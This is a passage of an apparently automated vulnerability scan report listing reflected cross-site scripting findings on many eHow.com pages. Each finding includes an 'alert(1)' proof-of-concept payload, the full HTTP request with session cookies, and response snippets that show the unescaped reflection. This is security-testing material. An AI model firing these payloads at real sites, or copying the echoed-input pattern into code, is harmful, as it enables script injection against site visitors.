GET /hobbies-and-science/?e398d'-alert(1)-'06fc955b57a=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:17 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 72225
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Hobbies & Science - How To Information | eHow.com ...[SNIP]... <fb:like href="http://www.ehow.com/hobbies-and-science/?e398d'-alert(1)-'06fc955b57a=1" ref="like" width="300"> ...[SNIP]...
1.382. http://www.ehow.com/holidays-and-celebrations/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/holidays-and-celebrations/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 506ce'-alert(1)-'b3c6ff17c61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /holidays-and-celebrations/?506ce'-alert(1)-'b3c6ff17c61=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:19 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 73326
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Holidays & Celebrations - How To Information | eH ...[SNIP]... <fb:like href="http://www.ehow.com/holidays-and-celebrations/?506ce'-alert(1)-'b3c6ff17c61=1" ref="like" width="300"> ...[SNIP]...
1.383. http://www.ehow.com/home-building-and-remodeling/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/home-building-and-remodeling/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed847'-alert(1)-'467cb45ab89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /home-building-and-remodeling/?ed847'-alert(1)-'467cb45ab89=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:18 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 72331
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Home Building & Remodeling - How To Information | ...[SNIP]... <fb:like href="http://www.ehow.com/home-building-and-remodeling/?ed847'-alert(1)-'467cb45ab89=1" ref="like" width="300"> ...[SNIP]...
1.384. http://www.ehow.com/home-design-and-decorating/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/home-design-and-decorating/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30749'-alert(1)-'96a91f5fd07 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /home-design-and-decorating/?30749'-alert(1)-'96a91f5fd07=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:18 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 72667
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Home Design & Decorating - How To Information | e ...[SNIP]... <fb:like href="http://www.ehow.com/home-design-and-decorating/?30749'-alert(1)-'96a91f5fd07=1" ref="like" width="300"> ...[SNIP]...
1.385. http://www.ehow.com/home-maintenance-and-repair/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/home-maintenance-and-repair/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9888d'-alert(1)-'5944bfd28d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /home-maintenance-and-repair/?9888d'-alert(1)-'5944bfd28d9=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:18 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 73411
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Home Maintenance & Repair - How To Information | ...[SNIP]... <fb:like href="http://www.ehow.com/home-maintenance-and-repair/?9888d'-alert(1)-'5944bfd28d9=1" ref="like" width="300"> ...[SNIP]...
1.386. http://www.ehow.com/home-safety-and-household-tips/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/home-safety-and-household-tips/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef6bc'-alert(1)-'0b251195974 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /home-safety-and-household-tips/?ef6bc'-alert(1)-'0b251195974=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:16 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 70494
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Home Safety & Household Tips - How To Information ...[SNIP]... <fb:like href="http://www.ehow.com/home-safety-and-household-tips/?ef6bc'-alert(1)-'0b251195974=1" ref="like" width="300"> ...[SNIP]...
1.387. http://www.ehow.com/housekeeping/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/housekeeping/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78bd5'-alert(1)-'57433244f77 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /housekeeping/?78bd5'-alert(1)-'57433244f77=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:18 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 71760
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Housekeeping - How To Information | eHow.com</tit ...[SNIP]... <fb:like href="http://www.ehow.com/housekeeping/?78bd5'-alert(1)-'57433244f77=1" ref="like" width="300"> ...[SNIP]...
1.388. http://www.ehow.com/how_13299_know-someone-lying.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/how_13299_know-someone-lying.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dcda3'-alert(1)-'e5bc67b4dc4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_13299_know-someone-lying.html?dcda3'-alert(1)-'e5bc67b4dc4=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:07 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 81599
1.389. http://www.ehow.com/how_2053743_make-crock-pot-pork-roast.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/how_2053743_make-crock-pot-pork-roast.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e87e0'-alert(1)-'d9cba84b7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_2053743_make-crock-pot-pork-roast.html?e87e0'-alert(1)-'d9cba84b7c=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:15:49 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 75941
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Make a Crock Pot Pork Roast | eHow.com</ti ...[SNIP]... <script language="javascript" type="text/javascript"> try { var OriginalURL = '/how_2053743_make-crock-pot-pork-roast.html?e87e0'-alert(1)-'d9cba84b7c=1'; } catch (e) { OriginalURL = ''; } try { if ((typeof(OriginalURL) == 'undefined') || (OriginalURL == null) || (OriginalURL == '')) { window.OriginalURL = '/how_2053743_make-crock-pot-po ...[SNIP]...
1.390. http://www.ehow.com/how_2077554_repair-cracks-dashboard.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/how_2077554_repair-cracks-dashboard.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6dcbd'-alert(1)-'5482c536ab0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_2077554_repair-cracks-dashboard.html?6dcbd'-alert(1)-'5482c536ab0=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:06 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 75255
1.391. http://www.ehow.com/how_2113353_end-sibling-feuds.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/how_2113353_end-sibling-feuds.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3cb73'-alert(1)-'4756d1fe387 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_2113353_end-sibling-feuds.html?3cb73'-alert(1)-'4756d1fe387=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:14 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 87744
1.392. http://www.ehow.com/how_2304056_cut-shirt-make-cuter.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/how_2304056_cut-shirt-make-cuter.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4b04'-alert(1)-'39477125765 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_2304056_cut-shirt-make-cuter.html?a4b04'-alert(1)-'39477125765=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:51 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 76783
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Cut a T Shirt To Make It Cuter | eHow.com< ...[SNIP]... <script language="javascript" type="text/javascript"> try { var OriginalURL = '/how_2304056_cut-shirt-make-cuter.html?a4b04'-alert(1)-'39477125765=1'; } catch (e) { OriginalURL = ''; } try { if ((typeof(OriginalURL) == 'undefined') || (OriginalURL == null) || (OriginalURL == '')) { window.OriginalURL = '/how_2304056_cut-shirt-make-cu ...[SNIP]...
1.393. http://www.ehow.com/how_3815_minutes-business-meeting.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/how_3815_minutes-business-meeting.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2374'-alert(1)-'6994478717a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_3815_minutes-business-meeting.html?a2374'-alert(1)-'6994478717a=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:15:50 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 91357
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Take Minutes at a Business Meeting | eHow. ...[SNIP]... <script language="javascript" type="text/javascript"> try { var OriginalURL = '/how_3815_minutes-business-meeting.html?a2374'-alert(1)-'6994478717a=1'; } catch (e) { OriginalURL = ''; } try { if ((typeof(OriginalURL) == 'undefined') || (OriginalURL == null) || (OriginalURL == '')) { window.OriginalURL = '/how_3815_minutes-business-mee ...[SNIP]...
1.394. http://www.ehow.com/how_4469163_edit-pdf-document.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/how_4469163_edit-pdf-document.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0dca'-alert(1)-'85cb027615b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_4469163_edit-pdf-document.html?b0dca'-alert(1)-'85cb027615b=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:06 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 78940
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Edit a PDF Document | eHow.com</title>
1.395. http://www.ehow.com/how_4474239_make-graph-using-excel.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/how_4474239_make-graph-using-excel.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f436'-alert(1)-'4415fbcb8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_4474239_make-graph-using-excel.html?4f436'-alert(1)-'4415fbcb8c=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:15:50 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 94577
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Make a Graph Using Excel | eHow.com</title ...[SNIP]... <script language="javascript" type="text/javascript"> try { var OriginalURL = '/how_4474239_make-graph-using-excel.html?4f436'-alert(1)-'4415fbcb8c=1'; } catch (e) { OriginalURL = ''; } try { if ((typeof(OriginalURL) == 'undefined') || (OriginalURL == null) || (OriginalURL == '')) { window.OriginalURL = '/how_4474239_make-graph-using- ...[SNIP]...
1.396. http://www.ehow.com/how_4924781_open-pub-file-mac.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/how_4924781_open-pub-file-mac.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8f4c'-alert(1)-'1c3432371cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_4924781_open-pub-file-mac.html?b8f4c'-alert(1)-'1c3432371cf=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:04 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 73508
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Open a Pub File on a Mac | eHow.com</title ...[SNIP]... <script language="javascript" type="text/javascript"> try { var OriginalURL = '/how_4924781_open-pub-file-mac.html?b8f4c'-alert(1)-'1c3432371cf=1'; } catch (e) { OriginalURL = ''; } try { if ((typeof(OriginalURL) == 'undefined') || (OriginalURL == null) || (OriginalURL == '')) { window.OriginalURL = '/how_4924781_open-pub-file-mac ...[SNIP]...
1.397. http://www.ehow.com/how_5073161_convert-wps-file-extension.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/how_5073161_convert-wps-file-extension.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa220'-alert(1)-'daadd8a210 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
